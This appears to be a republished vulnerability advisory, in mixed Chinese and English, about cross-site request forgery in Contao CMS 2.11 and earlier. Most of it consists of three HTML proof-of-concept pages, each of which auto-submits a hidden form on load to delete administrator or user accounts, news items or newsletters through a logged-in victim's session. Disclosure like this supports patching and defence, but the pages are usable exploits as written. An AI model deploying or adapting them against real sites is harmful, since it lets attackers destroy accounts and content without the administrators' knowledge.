标题: ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)
作者: Ivano Binetti (http://ivanobinetti.com)
下载地址: http://www.contao.org/en/download.html
开发这网站: http://www.contao.org
影响版本: 2.11.0 (最新)及更低版本
测试平台: Debian Squeeze (6.0)
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[多个缺陷by Ivano Binetti]-------------------------------------------+
Summary
1)程序介绍
2)缺陷描述
  2.1 删除管理员或用户
  2.2 删除新闻
  2.3 删除信笺
+--------------------------------------------------------------------------------------------------------------------------------+
1)程序介绍
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".
2)缺陷描述
Contao 2.11 (and lower)  is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages
(articles, news, newsletter and so on).
 2.1 删除管理员或用户
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to delete ADMIN/USER account</H2>
  <form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=user&act=delete&id=2">
  </body>
  </html>
  Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.
  2.2 删除新闻
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to 删除新闻</H2>
  <form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=news&act=delete&id=1">
  </form>
  </body>
  </html>
  2.3 删除新闻信笺
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <H2>CSRF Exploit to 删除新闻信笺</H2>
  <form method="POST" name="form0" action="http:// www.2cto.com /contao/contao/main.php?do=newsletter&act=delete&id=1">
  </form>
  </body>
  </html>